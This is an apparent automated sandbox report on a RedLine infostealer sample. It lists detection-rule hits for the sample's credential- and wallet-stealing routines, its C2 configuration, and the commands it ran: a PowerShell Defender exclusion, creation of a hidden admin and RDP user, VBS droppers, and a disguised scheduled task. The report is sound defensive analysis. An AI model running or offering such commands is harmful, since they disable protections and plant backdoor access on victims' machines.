9.3.Rifiutare.exe.com.4680aa0.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xc1ef:$u7: RunPE 0xf5d0:$u8: DownloadAndEx 0x133e8:$pat14: , CommandLine: 0xec6f:$v2_1: ListOfProcesses 0xc3cf:$v2_2: get_ScanVPN 0xc472:$v2_2: get_ScanFTP 0xd0f3:$v2_2: get_ScanDiscord 0xe049:$v2_2: get_ScanSteam 0xe065:$v2_2: get_ScanTelegram 0xe137:$v2_2: get_ScanScreen 0xedb3:$v2_2: get_ScanChromeBrowsersPaths 0xedeb:$v2_2: get_ScanGeckoBrowsersPaths 0xf12d:$v2_2: get_ScanBrowsers 0xf1d0:$v2_2: get_ScannedWallets 0xf1f6:$v2_2: get_ScanWallets 0xf216:$v2_3: GetArguments 0x11e69:$v2_3: GetArguments 0xd916:$v2_4: VerifyUpdate 0x11eb7:$v2_4: VerifyUpdate 0xf44a:$v2_5: VerifyScanRequest 0x11e82:$v2_5: VerifyScanRequest
19.2.RegAsm.exe.580000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
19.2.RegAsm.exe.580000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
19.2.RegAsm.exe.580000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
19.2.RegAsm.exe.580000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x14a40:$a1: ttp://checkip.amazonaws.com/logins.json 0x147d8:$a2: https://ipinfo.io/ip%appdata%\ 0x14d18:$a3: Software\Valve\SteamLogin Data 0x10dd0:$a4: get_ScannedWallets 0xfc65:$a5: get_ScanTelegram 0x109eb:$a6: get_ScanGeckoBrowsersPaths 0xe9b2:$a7: <Processes>k__BackingField 0xce94:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xe2d3:$a9: <ScanFTP>k__BackingField 0x10a72:$a10: DataManager.Data.Credentials
19.2.RegAsm.exe.580000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xf2dc:$gen03: get_UserDomainName 0x11319:$gen04: get_encrypted_key 0x10d4f:$gen06: GetBrowsers 0x10619:$gen07: get_InstalledInputLanguages 0xdf8b:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x14fd0:$spe6: windows-1251, CommandLine: 0x11d0a:$spe9: wallet 0xcd14:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xce0f:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xd11c:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xd290:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xcd77:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xcdc9:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xcf23:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xd1ba:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xd215:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
19.2.RegAsm.exe.580000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xddef:$u7: RunPE 0x111d0:$u8: DownloadAndEx 0x14fe8:$pat14: , CommandLine: 0x1086f:$v2_1: ListOfProcesses 0xdfcf:$v2_2: get_ScanVPN 0xe072:$v2_2: get_ScanFTP 0xecf3:$v2_2: get_ScanDiscord 0xfc49:$v2_2: get_ScanSteam 0xfc65:$v2_2: get_ScanTelegram 0xfd37:$v2_2: get_ScanScreen 0x109b3:$v2_2: get_ScanChromeBrowsersPaths 0x109eb:$v2_2: get_ScanGeckoBrowsersPaths 0x10d2d:$v2_2: get_ScanBrowsers 0x10dd0:$v2_2: get_ScannedWallets 0x10df6:$v2_2: get_ScanWallets 0x10e16:$v2_3: GetArguments 0x13a69:$v2_3: GetArguments 0xf516:$v2_4: VerifyUpdate 0x13ab7:$v2_4: VerifyUpdate 0x1104a:$v2_5: VerifyScanRequest 0x13a82:$v2_5: VerifyScanRequest
9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x14a40:$a1: ttp://checkip.amazonaws.com/logins.json 0x2aa48:$a1: ttp://checkip.amazonaws.com/logins.json 0x40a50:$a1: ttp://checkip.amazonaws.com/logins.json 0x594f8:$a1: ttp://checkip.amazonaws.com/logins.json 0x6e138:$a1: ttp://checkip.amazonaws.com/logins.json 0x147d8:$a2: https://ipinfo.io/ip%appdata%\ 0x2a7e0:$a2: https://ipinfo.io/ip%appdata%\ 0x407e8:$a2: https://ipinfo.io/ip%appdata%\ 0x59290:$a2: https://ipinfo.io/ip%appdata%\ 0x6ded0:$a2: https://ipinfo.io/ip%appdata%\ 0x14d18:$a3: Software\Valve\SteamLogin Data 0x2ad20:$a3: Software\Valve\SteamLogin Data 0x40d28:$a3: Software\Valve\SteamLogin Data 0x597d0:$a3: Software\Valve\SteamLogin Data 0x6e410:$a3: Software\Valve\SteamLogin Data 0x10dd0:$a4: get_ScannedWallets 0x26dd8:$a4: get_ScannedWallets 0x3cde0:$a4: get_ScannedWallets 0x55888:$a4: get_ScannedWallets 0x6a4c8:$a4: get_ScannedWallets 0xfc65:$a5: get_ScanTelegram
9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xf2dc:$gen03: get_UserDomainName 0x252e4:$gen03: get_UserDomainName 0x3b2ec:$gen03: get_UserDomainName 0x53d94:$gen03: get_UserDomainName 0x689d4:$gen03: get_UserDomainName 0x11319:$gen04: get_encrypted_key 0x27321:$gen04: get_encrypted_key 0x3d329:$gen04: get_encrypted_key 0x55dd1:$gen04: get_encrypted_key 0x6aa11:$gen04: get_encrypted_key 0x10d4f:$gen06: GetBrowsers 0x26d57:$gen06: GetBrowsers 0x3cd5f:$gen06: GetBrowsers 0x55807:$gen06: GetBrowsers 0x6a447:$gen06: GetBrowsers 0x10619:$gen07: get_InstalledInputLanguages 0x26621:$gen07: get_InstalledInputLanguages 0x3c629:$gen07: get_InstalledInputLanguages 0x550d1:$gen07: get_InstalledInputLanguages 0x69d11:$gen07: get_InstalledInputLanguages 0xdf8b:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xddef:$u7: RunPE 0x23df7:$u7: RunPE 0x39dff:$u7: RunPE 0x528a7:$u7: RunPE 0x674e7:$u7: RunPE 0x111d0:$u8: DownloadAndEx 0x271d8:$u8: DownloadAndEx 0x3d1e0:$u8: DownloadAndEx 0x55c88:$u8: DownloadAndEx 0x6a8c8:$u8: DownloadAndEx 0x14fe8:$pat14: , CommandLine: 0x2aff0:$pat14: , CommandLine: 0x40ff8:$pat14: , CommandLine: 0x59aa0:$pat14: , CommandLine: 0x6e6e0:$pat14: , CommandLine: 0x1086f:$v2_1: ListOfProcesses 0x26877:$v2_1: ListOfProcesses 0x3c87f:$v2_1: ListOfProcesses 0x55327:$v2_1: ListOfProcesses 0x69f67:$v2_1: ListOfProcesses 0xdfcf:$v2_2: get_ScanVPN
Click to see the 12 entries

Sigma Signatures

System Summary

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, CommandLine: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com D, ParentImage: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com, ParentProcessId: 2896, ParentProcessName: Rifiutare.exe.com, ProcessCommandLine: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, ProcessId: 4284, ProcessName: RegAsm.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, ParentImage: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, ParentProcessId: 5020, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""", ProcessId: 2932, ProcessName: cmd.exe

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 185.199.111.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6972, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49842

Sigma detected: Suspicious Add User to Remote Desktop Users Group

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: net localgroup "Remote Desktop Users" fsUIwEqMAc /add, CommandLine: net localgroup "Remote Desktop Users" fsUIwEqMAc /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6988, ParentProcessName: cmd.exe, ProcessCommandLine: net localgroup "Remote Desktop Users" fsUIwEqMAc /add, ProcessId: 1628, ProcessName: net.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, CommandLine: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5804, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, ProcessId: 1860, ProcessName: cscript.exe

Sigma detected: WScript or CScript Dropper - File

Source: File created

Author: Tim Shelton: Data: EventID: 11, Image: C:\Windows\SysWOW64\cscript.exe, ProcessId: 1860, TargetFilename: C:\Users\user\AppData\Roaming\UeNuQ\939.vbs

Sigma detected: Add User to Local Administrators Group

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: net localgroup Administrators fsUIwEqMAc /add, CommandLine: net localgroup Administrators fsUIwEqMAc /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6988, ParentProcessName: cmd.exe, ProcessCommandLine: net localgroup Administrators fsUIwEqMAc /add, ProcessId: 4364, ProcessName: net.exe

Sigma detected: New User Created Via Net.EXE

Source: Process started

Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: net user fsUIwEqMAc zyTFxcsIkA /add, CommandLine: net user fsUIwEqMAc zyTFxcsIkA /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6988, ParentProcessName: cmd.exe, ProcessCommandLine: net user fsUIwEqMAc zyTFxcsIkA /add, ProcessId: 3624, ProcessName: net.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 185.199.111.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6972, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49842

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53", CommandLine: schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6256, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53", ProcessId: 6304, ProcessName: schtasks.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, CommandLine: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5804, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs, ProcessId: 1860, ProcessName: cscript.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 2048, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 6972, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\DefaultSecureProtocols

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user fsUIwEqMAc zyTFxcsIkA /add, CommandLine: net user fsUIwEqMAc zyTFxcsIkA /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6988, ParentProcessName: cmd.exe, ProcessCommandLine: net user fsUIwEqMAc zyTFxcsIkA /add, ProcessId: 3624, ProcessName: net.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"", CommandLine: powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2932, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"", ProcessId: 180, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T08:20:46.785463+0100	2028371	3	Unknown Traffic	192.168.2.4	49842	185.199.111.133	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: 21jhss.club:80

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\UeNuQ\939.vbs	Avira: detection malicious, Label: VBS/Dldr.Agent.VPGN
Source: C:\Users\user\AppData\Roaming\UeNuQ\578.vbs	Avira: detection malicious, Label: VBS/Agent.4358

Found malware configuration

Source: 19.2.RegAsm.exe.580000.0.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["21jhss.club:80"], "Bot Id": "adsbb"}

Multi AV Scanner detection for submitted file

Source: 8lOT1rXZp5.exe	Virustotal: Detection: 53%			Perma Link
Source: 8lOT1rXZp5.exe	ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.7% probability

Source: 8lOT1rXZp5.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\System32\wscript.exe	Directory created: C:\Program Files\RDP Wrapper\
Source: C:\Windows\System32\wscript.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.bat

Source: unknown

HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49842 version: TLS 1.2

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_00409A19 ??2@YAPAXI@Z,FindFirstFileW,FindClose,	0_2_00409A19
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_004044EA FindFirstFileW,FindClose,SetLastError,CompareFileTime,	0_2_004044EA
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_0040340F FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_0040340F
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_0040352A FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,	0_2_0040352A
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C9E334 GetFileAttributesW,FindFirstFileW,FindClose,	7_2_00C9E334
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CAA32C FindFirstFileW,Sleep,FindNextFileW,FindClose,	7_2_00CAA32C
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CA65AE FindFirstFileW,FindNextFileW,FindClose,	7_2_00CA65AE
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CA72A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	7_2_00CA72A6
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CA7205 FindFirstFileW,FindClose,	7_2_00CA7205
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C9D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_00C9D7CC
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C9DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_00C9DB0B
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CA9E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	7_2_00CA9E43
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CA9F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	7_2_00CA9F9E
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A6E334 GetFileAttributesW,FindFirstFileW,FindClose,	10_2_00A6E334
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A7A32C FindFirstFileW,Sleep,FindNextFileW,FindClose,	10_2_00A7A32C
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A765AE FindFirstFileW,FindNextFileW,FindClose,	10_2_00A765AE
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A772A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	10_2_00A772A6
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A77205 FindFirstFileW,FindClose,	10_2_00A77205
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A6D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00A6D7CC
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A6DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00A6DB0B
